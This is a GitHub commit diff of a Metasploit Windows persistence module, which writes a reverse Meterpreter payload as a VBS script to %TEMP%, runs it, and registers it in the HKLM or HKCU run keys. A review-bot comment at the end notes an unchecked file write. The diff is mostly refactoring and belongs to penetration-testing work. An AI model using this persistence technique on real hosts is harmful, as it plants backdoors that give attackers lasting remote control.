Merge pull request #2 from jvazquez-r7/persistence_vbs
using Post::File methods plus a little more cleanup
darkoperator committed Feb 12, 2013
2 parents 7485e42 + 42a6d96 commit 091322f
Showing 1 changed file with 4 additions and 24 deletions.
28 changes: 4 additions & 24 deletions modules/exploits/windows/local/persistence.rb
@@ -26,11 +26,10 @@ def initialize(info={})
super( update_info( info,
'Name' => 'Windows Manage Persistent Payload Installer',
'Description' => %q{
This Module will create a boot persistent reverse Meterpreter session by
This Module will create a boot persistent reverse Meterpreter session by
installing on the target host the payload as a script that will be executed
at user logon or system startup depending on privilege and selected startup
method.
},
'License' => MSF_LICENSE,
'Author' =>
@@ -54,8 +53,7 @@ def initialize(info={})

end

# Exploit Method for when run command is issued
#-------------------------------------------------------------------------------
# Exploit Method for when exploit command is issued
def exploit
print_status("Running module against #{sysinfo['Computer']}")

@@ -114,20 +112,7 @@ def exploit
)
end

# Creates persistent script
#-------------------------------------------------------------------------------
def create_script(delay, altexe)
if not altexe.nil?
vbs = ::Msf::Util::EXE.to_win32pe_vbs(session.framework, payload.raw, {:persist => true, :delay => delay, :template => altexe})
else
vbs = ::Msf::Util::EXE.to_win32pe_vbs(session.framework, payload.raw, {:persist => true, :delay => delay})
end
print_status("Persistent agent script is #{vbs.length} bytes long")
return vbs
end

# Function for creating log folder and returning log path
#-------------------------------------------------------------------------------
def log_file(log_path = nil)
#Get hostname
host = session.sys.config.sysinfo["Computer"]
@@ -151,18 +136,15 @@ def log_file(log_path = nil)
end

# Writes script to target host
#-------------------------------------------------------------------------------
def write_script_to_target(vbs,name)
tempdir = session.fs.file.expand_path("%TEMP%")
tempdir = expand_path("%TEMP%")
if name == nil
tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
else
tempvbs = tempdir + "\\" + name + ".vbs"
end
begin
fd = session.fs.file.new(tempvbs, "wb")
fd.write(vbs)
fd.close
write_file(tempvbs, vbs)
print_good("Persistent Script written to #{tempvbs}")
@clean_up_rc << "rm #{tempvbs}\n"
rescue
@@ -174,7 +156,6 @@ def write_script_to_target(vbs,name)
end

# Executes script on target and return the PID of the process
#-------------------------------------------------------------------------------
def target_exec(script_on_target)
execsuccess = true
print_status("Executing script #{script_on_target}")
@@ -193,7 +174,6 @@ def target_exec(script_on_target)
end

# Installs payload in to the registry HKLM or HKCU
#-------------------------------------------------------------------------------
def write_to_reg(key,script_on_target, registry_value)
# Lets start to assume we had success.
write_success = true
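Review bot: In `write_script_to_target` the `print_good` message and the `@clean_up_rc` entry follow `write_file(tempvbs, vbs)` unconditionally, and the only failure handling is the bare `rescue` kept from the old code. If `write_file` can fail without raising (its contract is not visible in this diff), the module would report a script that was never written, and the cleanup record would no longer match what is actually on the host, which matters when every artifact has to be accounted for and removed after an assessment. Consider confirming the write before recording it, for example `raise "could not write #{tempvbs}" unless file_exist?(tempvbs)` directly after the `write_file` call (assuming the Post::File mixin's `file_exist?` is available here), and rescuing a named exception class instead of everything. The rescue body and the end of the method lie outside the hunk.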